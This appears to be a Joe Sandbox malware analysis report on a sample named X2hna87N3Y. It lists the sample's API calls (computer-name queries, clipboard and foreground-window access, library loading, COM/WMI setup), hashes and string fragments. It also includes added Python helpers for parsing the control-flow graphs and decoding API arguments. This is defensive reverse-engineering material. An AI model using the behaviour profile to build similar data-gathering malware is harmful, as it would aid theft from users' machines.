                                                                                                                   control_flow_graph 339 42b621-42b66b call 43b800 GetComputerNameExA 343 42b670-42b6b4 339->343 343->343 344 42b6b6-42b6bb 343->344 345 42b6dd-42b6e3 344->345 346 42b6bd-42b6c7 344->346 348 42b6e6-42b6ee 345->348 347 42b6d0-42b6d9 346->347 347->347 349 42b6db 347->349 350 42b6f0-42b6f1 348->350 351 42b70b-42b746 GetComputerNameExA 348->351 349->348 353 42b700-42b709 350->353 352 42b750-42b762 351->352 352->352 354 42b764-42b769 352->354 353->351 353->353 355 42b76b-42b772 354->355 356 42b78d-42b790 354->356 357 42b780-42b789 355->357 358 42b793-42b79b 356->358 357->357 359 42b78b 357->359 360 42b7ab-42b7e4 358->360 361 42b79d-42b79f 358->361 359->358 364 42b7f0-42b7fc 360->364 362 42b7a0-42b7a9 361->362 362->360 362->362 364->364 365 42b7fe-42b803 364->365 366 42b805-42b809 365->366 367 42b81d 365->367 368 42b810-42b819 366->368 369 42b820-42b828 367->369 368->368 370 42b81b 368->370 371 42b82a-42b82b 369->371 372 42b83b-42b87e call 43b800 369->372 370->369 373 42b830-42b839 371->373 377 42b880-42b904 372->377 373->372 373->373 377->377 378 42b90a-42b90f 377->378 379 42b911-42b918 378->379 380 42b92d-42b930 378->380 382 42b920-42b929 379->382 381 42b933-42b941 380->381 383 42ba77-42baaf 381->383 384 42b947-42b94f 381->384 382->382 385 42b92b 382->385 387 42bab0-42bad4 383->387 386 42b950-42b95d 384->386 385->381 388 42b970-42b976 386->388 389 42b95f-42b964 386->389 387->387 390 42bad6-42bae3 387->390 392 42b9c0-42b9ce 388->392 393 42b978-42b97b 388->393 391 42b993 389->391 394 42bae5-42bae6 390->394 395 42bafb-42bafe call 42e990 390->395 397 42b996-42b99a 391->397 400 42b9d0-42b9d3 392->400 401 42ba2f-42ba38 392->401 393->392 396 42b97d-42b990 393->396 398 42baf0-42baf9 394->398 405 42bb03-42bb22 395->405 396->391 404 42b99c-42b9a5 397->404 398->395 398->398 400->401 406 42b9d5-42ba2a 400->406 402 42ba42-42ba45 401->402 403 42ba3a-42ba3d 401->403 407 42ba70-42ba72 402->407 408 42ba47-42ba6b 402->408 403->404 404->383 409 42b9ab-42b9ad 404->409 406->397 407->391 408->391 409->386 410 42b9af 409->410 410->383
                                                                                                                  APIs
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B650
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042B721
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ComputerName
                                                                                                                  • String ID: 74;2
                                                                                                                  • API String ID: 3545744682-2613046512
                                                                                                                  • Opcode ID: a3c95d1cae347bb82dce8e974d34056801db8078145ca8302a7a1107be973abc
                                                                                                                  • Instruction ID: 4f06352ef8816ea675b9983930539fd211b23acf7a922de14625fc5bffaa1d73
                                                                                                                  • Opcode Fuzzy Hash: a3c95d1cae347bb82dce8e974d34056801db8078145ca8302a7a1107be973abc
                                                                                                                  • Instruction Fuzzy Hash: 83B1F3702047918FE7158F39D850732BFE2EFA6304F28859ED4D68B792C7799842CBA5

                                                                                                                   Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                   control_flow_graph 542 43a92f-43a94d GetForegroundWindow * 2
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 0043A92F
                                                                                                                  • GetForegroundWindow.USER32 ref: 0043A935
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ForegroundWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2020703349-0
                                                                                                                  • Opcode ID: 262ded6f0fc6756cb2a69c95e7e47d3379ab44c0c67f255a44d651c4b16913c6
                                                                                                                  • Instruction ID: 1206cc42ca0957667e450426facbddbc2952e795b2ff34e2790f480194ce9914
                                                                                                                  • Opcode Fuzzy Hash: 262ded6f0fc6756cb2a69c95e7e47d3379ab44c0c67f255a44d651c4b16913c6
                                                                                                                  • Instruction Fuzzy Hash: 04C04C38561D40EFC6048F24FC5D5343726B705245310643AD413C63B6DB349809CA18
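The two control_flow_graph lines above (the GetComputerNameExA routine starting at 42b621 and the GetForegroundWindow stub at 43a92f) are Joe Sandbox's text form of the graph image: each basic block appears as its numeric id and address range, followed by any `call <addr>` or API annotation (`Name * 2` means the block calls Name twice), and every `a->b` token is an edge. The helper below is an added example, not part of Joe Sandbox or of this report. It parses that notation and reports what an analyst otherwise reads off the picture by eye: which blocks touch APIs or call into the image, which blocks loop on themselves (self-edges such as 343->343 and 347->347, the shape one typically sees in length scans and string-decryption loops), where the function can exit, and whether any block is unreachable from the entry. The embedded input is the opening of the 42b621 graph (its first twelve edges) and the complete 43a92f line, copied from the report; the `Block`/`CFG` names and the address heuristic (a block address is at least four hex digits, which keeps the `2` in `* 2` from being mistaken for a block id) are my assumptions.

```python
import re
from collections import deque
from dataclasses import dataclass, field

# Joe Sandbox prints a function's graph as one whitespace-separated line:
#   <id> <start>[-<end>] [call <addr>] [ApiName [* n]] ...   plus   <a>-><b> edges
ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]{4,}(?:-[0-9a-f]{4,})?$")  # single address or range
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]*$")  # export names as the report prints them


@dataclass
class Block:
    bid: int
    start: int
    end: int
    apis: list = field(default_factory=list)   # API names annotated on this block
    calls: list = field(default_factory=list)  # 'call <addr>' targets inside the image


@dataclass
class CFG:
    blocks: dict   # id -> Block
    edges: list    # (src, dst) pairs
    entry: int     # first block listed, i.e. the function entry


def _classify(labels):
    """Split a block's trailing tokens into API names and call targets."""
    apis, calls = [], []
    i = 0
    while i < len(labels):
        tok = labels[i]
        nxt = labels[i + 1] if i + 1 < len(labels) else None
        if tok == "call" and nxt is not None:
            calls.append(int(nxt, 16))
            i += 2
        elif tok == "*" and nxt is not None and nxt.isdigit() and apis:
            apis.extend([apis[-1]] * (int(nxt) - 1))   # 'Name * n' = n calls
            i += 2
        else:
            if API_RE.match(tok):
                apis.append(tok)
            i += 1
    return apis, calls


def parse_cfg(text):
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, labels, order, cur = {}, [], {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # A block is a decimal id immediately followed by an address token.
        if ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")
            cur = int(tok)
            blocks[cur] = Block(cur, int(lo, 16), int(hi or lo, 16))
            labels[cur] = []
            order.append(cur)
            i += 2
            continue
        if cur is not None:          # anything else annotates the current block
            labels[cur].append(tok)
        i += 1
    for bid, labs in labels.items():
        blocks[bid].apis, blocks[bid].calls = _classify(labs)
    return CFG(blocks, edges, order[0] if order else None)


def reachable(cfg):
    succ = {}
    for a, b in cfg.edges:
        succ.setdefault(a, []).append(b)
    seen, todo = set(), deque([] if cfg.entry is None else [cfg.entry])
    while todo:
        n = todo.popleft()
        if n not in seen:
            seen.add(n)
            todo.extend(succ.get(n, []))
    return seen


def summarize(cfg):
    srcs = {a for a, _ in cfg.edges}
    return {
        "entry": cfg.blocks[cfg.entry].start,
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "api_blocks": {b: blk.apis for b, blk in cfg.blocks.items() if blk.apis},
        "calls": {b: blk.calls for b, blk in cfg.blocks.items() if blk.calls},
        "self_loops": sorted(a for a, b in cfg.edges if a == b),  # tight loops
        "exits": sorted(b for b in cfg.blocks if b not in srcs),  # no successor
        "unreachable": sorted(set(cfg.blocks) - reachable(cfg)),  # dead/mis-split
    }


# Copied from the report: first twelve edges of the 42b621 graph, and the 43a92f stub.
CFG_42B621_EXCERPT = (
    "control_flow_graph 339 42b621-42b66b call 43b800 GetComputerNameExA "
    "343 42b670-42b6b4 339->343 343->343 344 42b6b6-42b6bb 343->344 "
    "345 42b6dd-42b6e3 344->345 346 42b6bd-42b6c7 344->346 348 42b6e6-42b6ee 345->348 "
    "347 42b6d0-42b6d9 346->347 347->347 349 42b6db 347->349 350 42b6f0-42b6f1 348->350 "
    "351 42b70b-42b746 GetComputerNameExA 348->351 349->348"
)
CFG_43A92F = "control_flow_graph 542 43a92f-43a94d GetForegroundWindow * 2"

if __name__ == "__main__":
    for text in (CFG_42B621_EXCERPT, CFG_43A92F):
        print(summarize(parse_cfg(text)))
```

Feed it the full joined line from the report to get the whole 42b621 routine; the `exits` and `unreachable` lists are the quick sanity check that the edge list was not truncated when the page was extracted.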
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(E8A416A2,00000000,B6B58CB3), ref: 00409AEF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1029625771-0
                                                                                                                  • Opcode ID: 56dff4f8bcc4accb531d48fa8cc47d4cbedb4db9a90ea6a41831faa44498286f
                                                                                                                  • Instruction ID: c6f9b6d51d577ba26e22898352ec388f61cbabad47315b0f0ea3d5a6b5670c14
                                                                                                                  • Opcode Fuzzy Hash: 56dff4f8bcc4accb531d48fa8cc47d4cbedb4db9a90ea6a41831faa44498286f
                                                                                                                  • Instruction Fuzzy Hash: A61106743983504BD3049FB5D8907ABBBD5DBE6304F18893EA2D16B391C27C94068B57
                                                                                                                  APIs
                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 00433981
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DefaultLanguageUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 95929093-0
                                                                                                                  • Opcode ID: f3f87bbd72dc02260c30e3ae5b7116bffff979ed0794b041be2dba84b2d1c71b
                                                                                                                  • Instruction ID: dc3a6c972a9b93b16ff27444efc03cb3ccca3178f3acdf7ef73c2ad5c9848447
                                                                                                                  • Opcode Fuzzy Hash: f3f87bbd72dc02260c30e3ae5b7116bffff979ed0794b041be2dba84b2d1c71b
                                                                                                                  • Instruction Fuzzy Hash: 2311CA32E086A68FCB15CF788D542ADBB725F86120F4983ADC8A9B73D5D5304946CB91
                                                                                                                  APIs
                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B357,00000000,00000001), ref: 00439DC2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: ddfad08af3818a3282c1be2e13e1813404b47d4e0b7dd71cdbd5fbf32133f5de
                                                                                                                  • Instruction ID: a7f614b0da677e3024e6d14a98963a5d3270485aee8bd6adad4514946c06c77d
                                                                                                                  • Opcode Fuzzy Hash: ddfad08af3818a3282c1be2e13e1813404b47d4e0b7dd71cdbd5fbf32133f5de
                                                                                                                  • Instruction Fuzzy Hash: D9E02B36808211BBC7001F38BC07F5B3A64DF8B760F01483AF40096112EF79E801C59E
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,?,00439DDB,?,0040B357,00000000,00000001), ref: 0043858E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3298025750-0
                                                                                                                  • Opcode ID: 4d27a9eb09a83c038c697b2d49ea1aef4cc9dc8f399a98f750e8c4bce1e860c2
                                                                                                                  • Instruction ID: dc4db906ef4abdc6062e1ec96b6ffb3d7f96c39e0b630dcc26a530c02356fe47
                                                                                                                  • Opcode Fuzzy Hash: 4d27a9eb09a83c038c697b2d49ea1aef4cc9dc8f399a98f750e8c4bce1e860c2
                                                                                                                  • Instruction Fuzzy Hash: 02D0C935819622EFCA511F14FC0AB9A3B68EF0B33AF4648B5A504AB173C775DC508AD8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • Opcode ID: 1bb015d751bccc7e1b65caa3d199434df52486843717f7038fd04ea52af1d71a
                                                                                                                  • Instruction ID: 75aac33b15391c90e2742bf576256fc7d56d31493ce6768c953f00bc94e4aacc
                                                                                                                  • Opcode Fuzzy Hash: 1bb015d751bccc7e1b65caa3d199434df52486843717f7038fd04ea52af1d71a
                                                                                                                  • Instruction Fuzzy Hash: 61F06774508701DFD314DF68D5A8B1ABBF0FB89708F10481CE4968B3A0D7B5A949DF82
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • Opcode ID: 55bbcebe619f4518c91a9bf09d85cc53cdbe2441480fe7ee5ab18dcae6a62715
                                                                                                                  • Instruction ID: dd1717d23431f6f681abbaa4f2c49bd438863432c7c7db0f5c118dfe783689f4
                                                                                                                  • Opcode Fuzzy Hash: 55bbcebe619f4518c91a9bf09d85cc53cdbe2441480fe7ee5ab18dcae6a62715
                                                                                                                  • Instruction Fuzzy Hash: B4F062B450C3419FE314DF28C5A871BBBE0BB89348F11891DF4998B390C7BA9648DF86
                                                                                                                  APIs
                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C913
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: a25ab9109f3d3541e02e38eafc44524233b353671a7f5019b2851014eed3edcb
                                                                                                                  • Instruction ID: 37f0727ff88642b787521174195b22b3165ce90bd0762f1725373de6e61a95c3
                                                                                                                  • Opcode Fuzzy Hash: a25ab9109f3d3541e02e38eafc44524233b353671a7f5019b2851014eed3edcb
                                                                                                                  • Instruction Fuzzy Hash: 7DE02B31FA11041BE304672CDC0BF8A3A1E93C6360F088235A211C67E9E93CA856C159
                                                                                                                  APIs
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C950
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeSecurity
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 640775948-0
                                                                                                                  • Opcode ID: b00ed48d21e8d6b8f1fb8b63251f62e37b9ddfa6e67e49aec58d758fc7eb299c
                                                                                                                  • Instruction ID: 1b92964ae9c8a0e0a6f749654b3c852f3ad484dfbff75f12e03543587c657db6
                                                                                                                  • Opcode Fuzzy Hash: b00ed48d21e8d6b8f1fb8b63251f62e37b9ddfa6e67e49aec58d758fc7eb299c
                                                                                                                  • Instruction Fuzzy Hash: E1E01735BC520067F7284608EC47F4422535382F21F3C8226B312FE7E8E9A8A001410C
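Each entry in these `APIs` lists has the form `Name.Module(args), ref: <call site>`, with recovered arguments as raw hex and `?` where the sandbox could not recover one. Read against the SDK constants, the two GetComputerNameExA calls above request ComputerNamePhysicalDnsDomain (6) and ComputerNamePhysicalDnsHostname (5), and the CoInitializeEx(NULL, 2) / CoInitializeSecurity(..., authn 0, imp 3, ...) pair, with the two "BlanketProxy" routines (presumably CoSetProxyBlanket) listed above, is the standard apartment-threaded, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE setup a client performs before a WMI query. The decoder below is an added example, not Joe Sandbox code: it parses those lines, names the enum and flag values from the public Windows headers, and refuses to decode values that cannot be what the parameter claims. The LoadLibraryExW entry is the case to watch: E8A416A2 as a string pointer lies above the 32-bit user-mode range and B6B58CB3 has bits outside the LOAD_LIBRARY_* mask, so whatever the report printed for that call site should be treated as unreliable rather than read as a flag or path. The `USER_MODE_LIMIT` of 0x80000000 (default 2 GB split for a 32-bit process) and the parameter tables are my assumptions.

```python
import re

# One entry of the report's "APIs" list:  Name.Module(arg,arg,...), ref: <call site>
# The parenthesised args are optional (GetForegroundWindow.USER32 ref: 0043A92F).
API_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constants from the public Windows SDK headers.
COMPUTER_NAME_FORMAT = {
    0: "ComputerNameNetBIOS", 1: "ComputerNameDnsHostname", 2: "ComputerNameDnsDomain",
    3: "ComputerNameDnsFullyQualified", 4: "ComputerNamePhysicalNetBIOS",
    5: "ComputerNamePhysicalDnsHostname", 6: "ComputerNamePhysicalDnsDomain",
    7: "ComputerNamePhysicalDnsFullyQualified",
}
RPC_C_AUTHN_LEVEL = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE",
                     2: "RPC_C_AUTHN_LEVEL_CONNECT", 3: "RPC_C_AUTHN_LEVEL_CALL",
                     4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
                     6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
RPC_C_IMP_LEVEL = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS",
                   2: "RPC_C_IMP_LEVEL_IDENTIFY", 3: "RPC_C_IMP_LEVEL_IMPERSONATE",
                   4: "RPC_C_IMP_LEVEL_DELEGATE"}
COINIT_FLAGS = {0: "COINIT_MULTITHREADED", 2: "COINIT_APARTMENTTHREADED",
                4: "COINIT_DISABLE_OLE1DDE", 8: "COINIT_SPEED_OVER_MEMORY"}
LOAD_LIBRARY_FLAGS = {
    0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
    0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE", 0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x80: "LOAD_LIBRARY_REQUIRE_SIGNED_TARGET", 0x100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR", 0x400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32", 0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}

# (argument index, parameter name, kind, table) for the calls seen in this report.
PARAM_SPECS = {
    "GetComputerNameExA": [(0, "NameType", "enum", COMPUTER_NAME_FORMAT)],
    "CoInitializeEx": [(0, "pvReserved", "ptr", None), (1, "dwCoInit", "flags", COINIT_FLAGS)],
    "CoInitializeSecurity": [(4, "dwAuthnLevel", "enum", RPC_C_AUTHN_LEVEL),
                             (5, "dwImpLevel", "enum", RPC_C_IMP_LEVEL)],
    "LoadLibraryExW": [(0, "lpLibFileName", "ptr", None),
                       (2, "dwFlags", "flags", LOAD_LIBRARY_FLAGS)],
}

USER_MODE_LIMIT = 0x80000000  # assumption: 32-bit process with the default 2 GB user split


def _enum(v, table):
    return table.get(v, f"unknown 0x{v:x}")


def _flags(v, table):
    if v == 0:
        return table.get(0, "0")
    known = 0
    for bit in table:
        known |= bit
    if v & ~known:   # bits that no documented flag uses: not a real flags value
        return f"implausible: 0x{v:08x} has bits outside the known flag mask 0x{known:x}"
    return "|".join(name for bit, name in sorted(table.items()) if bit and v & bit)


def _ptr(v):
    if v == 0:
        return "NULL"
    if v >= USER_MODE_LIMIT:
        return f"implausible user-mode pointer 0x{v:08x}"
    return f"0x{v:08x}"


def decode_api_line(line):
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")] if raw else []
    decoded = {}
    for idx, pname, kind, table in PARAM_SPECS.get(m.group("name"), []):
        if idx >= len(args) or args[idx] is None:
            decoded[pname] = "not recovered"     # the report prints '?' for these
        elif kind == "enum":
            decoded[pname] = _enum(args[idx], table)
        elif kind == "flags":
            decoded[pname] = _flags(args[idx], table)
        else:
            decoded[pname] = _ptr(args[idx])
    return {"api": m.group("name"), "module": m.group("module"),
            "ref": int(m.group("ref"), 16), "args": args, "decoded": decoded}


def decode_report(lines):
    return [r for r in (decode_api_line(l) for l in lines) if r]


# Lines copied from the report above.
REPORT_LINES = [
    "• GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B650",
    "• GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042B721",
    "• GetForegroundWindow.USER32 ref: 0043A92F",
    "• LoadLibraryExW.KERNEL32(E8A416A2,00000000,B6B58CB3), ref: 00409AEF",
    "• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C913",
    "• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,"
    "00000003,00000000,00000000,00000000), ref: 0040C950",
]

if __name__ == "__main__":
    for r in decode_report(REPORT_LINES):
        print(f"{r['ref']:08x} {r['module']}!{r['api']} {r['decoded']}")
```

Extend `PARAM_SPECS` per API as you triage; the plausibility checks matter more than the tables, because a decoded-looking name for a junk argument is worse than a raw hex value.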
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,?,00439DD0), ref: 00438560
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: b1ada83ec4012304df24ae6854d180094443cd6a3481925689b5f910172c1123
                                                                                                                  • Instruction ID: 00f352df6ed085bcf73a54b18d0cd417c1e8254c01ad145fbb60ffdf05646862
                                                                                                                  • Opcode Fuzzy Hash: b1ada83ec4012304df24ae6854d180094443cd6a3481925689b5f910172c1123
                                                                                                                  • Instruction Fuzzy Hash: 5AC09B31045120AFD5502B15FC05FC63F54DF55375F014055B14467172C761BC82C6DC
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                  • String ID: .$Y$[$\$`$c$d$e$g$j$l$z
                                                                                                                  • API String ID: 2832541153-2078725520
                                                                                                                  • Opcode ID: b02562f9b126e923e6745480620a71e2c506461f439a6dc04addfcacb6fc504d
                                                                                                                  • Instruction ID: 34ece6c18be3c3dc7650849af3ebc91d39a4b8b5f9aba95e03bd70d8208d34c8
                                                                                                                  • Opcode Fuzzy Hash: b02562f9b126e923e6745480620a71e2c506461f439a6dc04addfcacb6fc504d
                                                                                                                  • Instruction Fuzzy Hash: 8541A17150C7808ED300EF78D99835FBFE09B95314F088A3EE5D98A282D679855DCBA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: *+$7($IC$MN$NK$V5$i}$q:s<$sF+X$wBtD$zz$}r$02$35$79$<>$RST$^P${}
                                                                                                                  • API String ID: 0-1770178174
                                                                                                                  • Opcode ID: 06a3d6a823a9bfc3696c8ae16ace9e56210287fdb9f1687bb38651e152501e00
                                                                                                                  • Instruction ID: bfa19e531ae2230c3e439caa4c7f29b2efdd26e24159ab1956b24a50d58d668d
                                                                                                                  • Opcode Fuzzy Hash: 06a3d6a823a9bfc3696c8ae16ace9e56210287fdb9f1687bb38651e152501e00
                                                                                                                  • Instruction Fuzzy Hash: 1FA262B560C3918BC334CF24D4417ABBBF2FBC2704F40892DE5D95B251E7759A4A8B8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: *+$7($IC$MN$NK$V5$i}$q:s<$sF+X$wBtD$zz$}r$02$35$79$<>$RST$^P${}
                                                                                                                  • API String ID: 0-1770178174
                                                                                                                  • Opcode ID: 5e72d88c3049cae1f9b57451ea9c476af6ad9d3158b4602070947b49a941448b
                                                                                                                  • Instruction ID: 7a613edb201a7144dd42080cbd371573025cbb79147fe86f555ad8c126c2d898
                                                                                                                  • Opcode Fuzzy Hash: 5e72d88c3049cae1f9b57451ea9c476af6ad9d3158b4602070947b49a941448b
                                                                                                                  • Instruction Fuzzy Hash: 51824FB560C3918BD334CF14D441BABBBF2EBC2304F40892DE5D96B251D7759A4A8B8B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00439DF0: LdrInitializeThunk.NTDLL(0043BEAB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E1E
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 004197CA
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041984B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                                  • String ID: &Z%\$'V.h$1B&D$7F4X$<^+P$I,~M$ef
                                                                                                                  • API String ID: 764372645-3042980244
                                                                                                                  • Opcode ID: b5cf74329583fb6dc28f109f741bad194bfc5361b5aff80978676ceb2c5dc174
                                                                                                                  • Instruction ID: 4b32854c7adb2e36c83dc4de8b600ec710a23a622ab1c4226f67f038759c5c60
